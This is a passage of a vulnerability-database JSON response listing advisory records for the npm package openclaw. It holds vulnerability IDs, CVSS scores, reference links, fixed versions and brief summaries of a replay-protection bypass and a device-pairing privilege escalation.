bility":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2-beta.1"}],"aliases":["GHSA-2cwr-f5hx-gg3w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jtjv-j6yj-93et"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90282?format=json","vulnerability_id":"VCID-jtxm-z4vv-cqg7","summary":"Duplicate Advisory: OpenClaw: Plivo V2 verified replay identity drifts on query-only variants\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-cg6c-q2hx-69h7. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.23 contains a replay identity vulnerability in Plivo V2 signature verification that allows attackers to bypass replay protection by modifying query parameters. The verification path derives replay keys from the full URL including query strings instead of the canonicalized base URL, enabling attackers to mint new verified request keys through unsigned query-only changes to signed requests.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/b0ce53a79cf63834660270513e26d921899b4e5b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg6c-q2hx-69h7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35618","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35618"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-replay-identity-drift-via-query-only-variants-in-plivo-v2-verification"},{"reference_url":"https://github.com/advisories/GHSA-j56c-wpqm-h24x","reference_id":"GHSA-j56c-wpqm-h24x","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j56c-wpqm-h24x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["GHSA-j56c-wpqm-h24x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jtxm-z4vv-cqg7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91709?format=json","vulnerability_id":"VCID-k3up-1vdf-2uh9","summary":"Duplicate Advisory: OpenClaw: /pair approve command path omitted caller scope subsetting and reopened device pairing escalation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hc5h-pmr3-3497. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a privilege escalation vulnerability in the /pair approve command path that fails to forward caller scopes into the core approval check. A caller with pairing privileges but without admin privileges can approve pending device requests asking for broader scopes including admin access by exploiting the missing scope validation in extensions/device-pair/index.ts and src/infra/device-pairing.ts.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hc5h-pmr3-3497"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33579","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33579"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-missing-caller-scope-validation-in-device-pair-approval"},{"reference_url":"https://github.com/advisories/GHSA-f275-5h5c-5wg5","reference_id":"GHSA-f275-5h5c-5wg5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f275-5h5c-5wg5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1